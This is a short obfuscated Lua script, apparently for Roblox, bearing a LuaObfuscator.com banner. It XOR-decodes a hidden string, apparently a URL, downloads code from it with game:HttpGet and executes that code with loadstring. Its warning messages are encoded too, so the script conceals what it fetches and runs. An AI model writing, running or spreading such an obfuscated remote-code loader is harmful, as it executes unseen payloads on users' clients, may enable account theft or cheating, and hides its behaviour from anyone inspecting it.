--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11) local v12={};for v13=1, #v10 do v6(v12,v0(v4(v1(v2(v10,v13,v13 + 1 )),v1(v2(v11,1 + (v13% #v11) ,1 + (v13% #v11) + 1 )))%256 ));end return v5(v12);end local v8=v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\252\32\232\190\213\31\221\207\206\36\169\156\194\16\212\209\218\41\171\136\196\12\216\211\207\104\169\169\194\24\194\140\211\32\231\191\212\81\220\194\210\43\169\152\200\19\220\194\213\33\163\233\151\28\208\209\158\119\182\188\194\16\212\209\218\41","\126\177\163\187\69\134\219\167");local v9=game:HttpGet(v8);if v9 then local v14,v15=pcall(loadstring(v9));if  not v14 then warn(v7("\6\223\56\202\238\99\193\37\196\248\42\195\45\133\239\32\223\35\213\232\121\141","\156\67\173\74\165")   .. v15 );end else warn(v7("\18\182\64\26\185\34\6\32\184\9\4\185\50\84\61\178\95\19\252\53\69\38\190\89\2\252\32\84\59\186\9\35\142\10\8","\38\84\215\41\118\220\70"));end
